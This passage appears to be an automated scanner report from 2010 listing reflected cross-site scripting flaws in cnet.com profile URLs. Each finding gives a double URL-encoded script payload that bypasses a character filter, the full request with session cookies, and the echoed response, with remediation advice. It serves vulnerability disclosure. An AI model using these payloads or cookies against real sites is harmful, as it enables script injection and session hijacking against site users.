Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:43 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=949
Connection: Keep-Alive
Content-Length: 31056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Nicole Leeaae89<script>alert(1)</script>80beff7c63a's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e923dc9d2e2f was submitted in the REST URL parameter 2. This input was echoed as c2e66"><script>alert(1)</script>923dc9d2e2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Nicole+Leec2e66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e923dc9d2e2f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:41 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:42 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 31138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Nicole Leec2e66"><script>alert(1)</script>923dc9d2e2f"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e90930d442de was submitted in the REST URL parameter 2. This input was echoed as 279b7"><script>alert(1)</script>90930d442de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Peter+N.+Glaskowsky279b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e90930d442de/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:13 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:13 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=983
Connection: Keep-Alive
Content-Length: 31206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Peter N. Glaskowsky279b7"><script>alert(1)</script>90930d442de"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b895b%253cscript%253ealert%25281%2529%253c%252fscript%253edc764dbbadd was submitted in the REST URL parameter 2. This input was echoed as b895b<script>alert(1)</script>dc764dbbadd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Peter+N.+Glaskowskyb895b%253cscript%253ealert%25281%2529%253c%252fscript%253edc764dbbadd/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:15 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:15 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=980
Connection: Keep-Alive
Content-Length: 31240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Peter N. Glaskowskyb895b<script>alert(1)</script>dc764dbbadd's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8362a%253cscript%253ealert%25281%2529%253c%252fscript%253e8404cc657ee was submitted in the REST URL parameter 2. This input was echoed as 8362a<script>alert(1)</script>8404cc657ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/SJ25718362a%253cscript%253ealert%25281%2529%253c%252fscript%253e8404cc657ee/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:44 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:44 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=981
Connection: Keep-Alive
Content-Length: 30994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>SJ25718362a<script>alert(1)</script>8404cc657ee's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada9b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fe361ba10f was submitted in the REST URL parameter 2. This input was echoed as ada9b"><script>alert(1)</script>5fe361ba10f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/SJ2571ada9b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fe361ba10f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:43 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=962
Connection: Keep-Alive
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="SJ2571ada9b"><script>alert(1)</script>5fe361ba10f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23a8f%253cscript%253ealert%25281%2529%253c%252fscript%253e2ff2330792d was submitted in the REST URL parameter 2. This input was echoed as 23a8f<script>alert(1)</script>2ff2330792d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/ScottStein823a8f%253cscript%253ealert%25281%2529%253c%252fscript%253e2ff2330792d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:33 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:33 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=931
Connection: Keep-Alive
Content-Length: 31107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ScottStein823a8f<script>alert(1)</script>2ff2330792d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71af06dbc33 was submitted in the REST URL parameter 2. This input was echoed as 37a10"><script>alert(1)</script>71af06dbc33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/ScottStein837a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71af06dbc33/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:31 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:31 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=965
Connection: Keep-Alive
Content-Length: 31073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ScottStein837a10"><script>alert(1)</script>71af06dbc33"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5325f%253cscript%253ealert%25281%2529%253c%252fscript%253e784fb60e8be was submitted in the REST URL parameter 2. This input was echoed as 5325f<script>alert(1)</script>784fb60e8be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/Shankland5325f%253cscript%253ealert%25281%2529%253c%252fscript%253e784fb60e8be/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:18 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:18 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=989
Connection: Keep-Alive
Content-Length: 31046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Shankland5325f<script>alert(1)</script>784fb60e8be's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1a5ee1e175 was submitted in the REST URL parameter 2. This input was echoed as c1a18"><script>alert(1)</script>d1a5ee1e175 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/Shanklandc1a18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1a5ee1e175/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:17 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:17 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 31054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Shanklandc1a18"><script>alert(1)</script>d1a5ee1e175"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdcfe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec80dca6c587 was submitted in the REST URL parameter 2. This input was echoed as cdcfe"><script>alert(1)</script>c80dca6c587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/TheAudiophiliaccdcfe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec80dca6c587/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:16:21 GMT
